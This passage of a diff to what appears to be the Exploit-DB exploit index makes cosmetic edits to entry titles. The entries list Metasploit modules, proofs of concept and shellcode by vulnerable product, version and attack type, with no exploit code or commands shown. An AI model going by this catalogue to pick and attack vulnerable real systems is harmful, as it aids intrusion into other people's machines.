JBIG2Decode Memory Corruption (1)",2010-06-15,Metasploit,windows,local,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption",2010-10-22,Metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)",2010-10-04,Metasploit,windows,remote,0 @@ -14476,7 +14477,7 @@ id,file,description,date,author,platform,type,port 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow",2010-09-25,Metasploit,windows,local,0 16671,platforms/windows/local/16671.rb,"Adobe PDF - Embedded EXE Social Engineering",2010-12-16,Metasploit,windows,local,0 -16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,Metasploit,windows,local,0 +16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (2)",2010-09-25,Metasploit,windows,local,0 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 @@ -14511,7 +14512,7 @@ id,file,description,date,author,platform,type,port 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow",2010-07-03,Metasploit,windows,remote,0 -16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 +16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Overflow",2010-07-03,Metasploit,windows,remote,0 16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,Metasploit,windows,remote,0 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 @@ -14528,13 +14529,13 @@ id,file,description,date,author,platform,type,port 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption",2010-09-20,Metasploit,windows,remote,0 -16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 +16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Overflow",2010-07-03,Metasploit,windows,remote,0 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,Metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow",2010-04-30,Metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 -16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - Username Overflow",2010-09-20,Metasploit,windows,remote,0 +16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - 'Username' Overflow",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows/x86) - FTP PASS Overflow",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version - Exploit",2010-04-30,Metasploit,windows,remote,21 @@ -14592,8 +14593,8 @@ id,file,description,date,author,platform,type,port 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows/x86) - URL Handling Buffer Overflow",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 -16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,cfm,webapps,0 -16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,multiple,remote,8080 +16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,cfm,webapps,0 +16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,multiple,remote,8080 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,Metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 @@ -14607,7 +14608,7 @@ id,file,description,date,author,platform,type,port 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 -16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway - username Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 +16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway - 'Username' Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus - Web Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow",2010-07-08,Metasploit,windows,remote,0 @@ -14620,7 +14621,7 @@ id,file,description,date,author,platform,type,port 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell Groupwise Messenger Client - Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 -16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 +16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - 'Username' Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 16819,platforms/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 @@ -14665,22 +14666,22 @@ id,file,description,date,author,platform,type,port 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow",2010-07-14,Metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption",2010-09-04,Metasploit,linux,remote,0 -16861,platforms/linux/remote/16861.rb,"Samba (Linux/x86) - trans2open Overflow Exploit",2010-07-14,Metasploit,linux,remote,0 +16861,platforms/linux/remote/16861.rb,"Samba (Linux/x86) - trans2open Overflow",2010-07-14,Metasploit,linux,remote,0 16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer - LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 -16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OS X) - Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 (OS X) - Overflow Exploit",2010-05-09,Metasploit,osx,remote,0 +16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 (OSX) - Overflow Exploit",2010-05-09,Metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Safari - Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 -16867,platforms/osx/remote/16867.rb,"Apple Mac OS X Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 +16867,platforms/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution",2010-09-20,Metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 16870,platforms/multiple/remote/16870.rb,"Mail.app - Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 -16871,platforms/osx/remote/16871.rb,"Apple Mac OS X - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 +16871,platforms/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow",2010-09-20,Metasploit,osx,remote,0 -16873,platforms/osx/remote/16873.rb,"Apple Mac OS X QuickTime - RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 -16874,platforms/osx/remote/16874.rb,"Apple Mac OS X EvoCam - HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 -16875,platforms/osx/remote/16875.rb,"Samba (OS X) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,osx,remote,0 -16876,platforms/osx_ppc/remote/16876.rb,"Samba (OS X/PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 +16873,platforms/osx/remote/16873.rb,"Apple Mac OSX QuickTime - RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 +16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam - HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,osx,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba (OSX/PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution",2010-10-06,Metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow",2010-12-02,Metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 - report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 @@ -14799,17 +14800,17 @@ id,file,description,date,author,platform,type,port 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17002,platforms/php/webapps/17002.txt,"CMS Loko Media - Local File Download",2011-03-18,Xr0b0t,php,webapps,0 17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQL Injection / Brute Force Exploit",2011-03-18,TecR0c,php,webapps,0 -17004,platforms/linux/dos/17004.txt,"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate NULL Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 -17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary Upload File",2011-03-19,Xr0b0t,php,webapps,0 +17004,platforms/linux/dos/17004.txt,"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 +17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary File Upload",2011-03-19,Xr0b0t,php,webapps,0 17006,platforms/php/webapps/17006.txt,"Balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 -17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File",2011-03-19,Xr0b0t,php,webapps,0 +17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary File Upload",2011-03-19,Xr0b0t,php,webapps,0 17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 - Arbitrary File Upload",2011-03-19,eidelweiss,php,webapps,0 17011,platforms/asp/webapps/17011.txt,"Douran 3.9.7.8 - File Download/Source Code Disclosure",2011-03-20,"AJAX Security Team",asp,webapps,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - m3u SEH Overflow",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 17014,platforms/php/webapps/17014.txt,"CMS Lokomedia 1.5 - Arbitrary File Upload",2011-03-21,eidelweiss,php,webapps,0 -17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 -17016,platforms/asp/webapps/17016.txt,"EAFlashUpload 2.5 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 +17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 - Arbitrary File Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 +17016,platforms/asp/webapps/17016.txt,"EAFlashUpload 2.5 - Arbitrary File Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 17018,platforms/php/webapps/17018.txt,"Shimbi CMS - Multiple SQL Injections",2011-03-21,p0pc0rn,php,webapps,0 17019,platforms/windows/dos/17019.txt,"RealPlayer 14.0.1.633 - Heap Overflow",2011-03-21,"Luigi Auriemma",windows,dos,0 17020,platforms/netware/dos/17020.py,"Novell Netware - NWFTPD.NLM DELE Remote Code Execution",2011-03-21,"Francis Provencher",netware,dos,0 @@ -14851,7 +14852,7 @@ id,file,description,date,author,platform,type,port 17061,platforms/php/webapps/17061.txt,"Andy's PHP KnowledgeBase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 - Persistent Cross-Site Scripting",2011-03-29,"AutoSec Tools",php,webapps,0 17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 -17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local SEH Buffer Overflow",2011-03-29,Dr_IDE,windows,local,0 +17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local Buffer Overflow (SEH)",2011-03-29,Dr_IDE,windows,local,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",multiple,remote,0 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",windows,dos,0 @@ -14863,7 +14864,7 @@ id,file,description,date,author,platform,type,port 17077,platforms/php/webapps/17077.txt,"pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 -17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Remote File Upload",2011-03-30,Net.Edit0r,php,webapps,0 +17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0 17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 @@ -14871,7 +14872,7 @@ id,file,description,date,author,platform,type,port 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0 17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local,0 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit",2011-04-01,^Xecuti0N3r,windows,dos,0 -17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 +17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17092,platforms/php/webapps/17092.html,"Allomani News 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17093,platforms/php/webapps/17093.html,"Allomani Movies Library 2.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14943,7 +14944,7 @@ id,file,description,date,author,platform,type,port 17161,platforms/windows/dos/17161.txt,"Microsoft Reader 2.1.1.3143 - Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17162,platforms/windows/dos/17162.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",windows,dos,0 17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 -17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 +17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection / Full Path Disclosure",2011-04-13,swami,php,webapps,0 17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt' Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",windows,local,0 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,bsd,local,0 @@ -14990,7 +14991,7 @@ id,file,description,date,author,platform,type,port 17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 -17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 +17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)",2011-04-29,webDEViL,windows,dos,0 @@ -15031,7 +15032,7 @@ id,file,description,date,author,platform,type,port 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0 17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 -17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Remote File Upload",2011-05-14,"Number 7",php,webapps,0 +17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Arbitrary File Upload",2011-05-14,"Number 7",php,webapps,0 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps,0 @@ -15079,7 +15080,7 @@ id,file,description,date,author,platform,type,port 17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik - SQL Injection",2011-05-29,SOLVER,php,webapps,0 17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 -17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload Exploit",2011-05-30,"Treasure Priyamal",php,webapps,0 +17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",php,webapps,0 17347,platforms/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,php,webapps,0 17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 - Exploit",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,php,webapps,0 @@ -15100,13 +15101,13 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 +17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 -17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 +17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Arbitrary File Deletion",2011-06-10,LiquidWorm,php,webapps,0 17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l Parameter) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 17381,platforms/windows/remote/17381.txt,"simple Web-Server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 @@ -15157,7 +15158,7 @@ id,file,description,date,author,platform,type,port 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 -17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 +17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass Exploit",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 @@ -15208,14 +15209,14 @@ id,file,description,date,author,platform,type,port 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,asp,webapps,0 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17495,platforms/php/webapps/17495.txt,"BbZL.php - File Inclusion",2011-07-06,"Number 7",php,webapps,0 -17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 - Cross-Site Request Forgery Exploit",2011-07-06,"Luis Santana",php,webapps,0 +17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 - Cross-Site Request Forgery",2011-07-06,"Luis Santana",php,webapps,0 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow",2011-07-06,LiquidWorm,windows,dos,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps,0 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U - Denial of Service/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer 